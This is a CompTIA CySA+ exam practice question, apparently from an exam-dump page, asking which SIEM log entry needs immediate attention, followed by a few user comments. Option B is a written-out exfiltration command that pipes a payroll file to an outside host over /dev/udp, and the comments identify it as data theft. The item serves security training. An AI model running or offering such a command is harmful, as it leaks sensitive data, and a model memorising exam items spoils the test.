A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?
A. nmap -A -sV 192.168.1.235
B. cat payroll.csv > /dev/udp/123.456.123.456/53
C. cat/etc/passwd
D. mysql -h 192.168.1.235 -u test -p
CS0-002: CompTIA CySA+ ExamFULL Printable PDF and Software. VALID exam to help you PASS. |
but what i am seen if the user reading password file it is very dangerous. Am I right!
why B?
B is sending the payroll csv to the attacker. data exfiltration.
a is a scan
c is reading the passwd file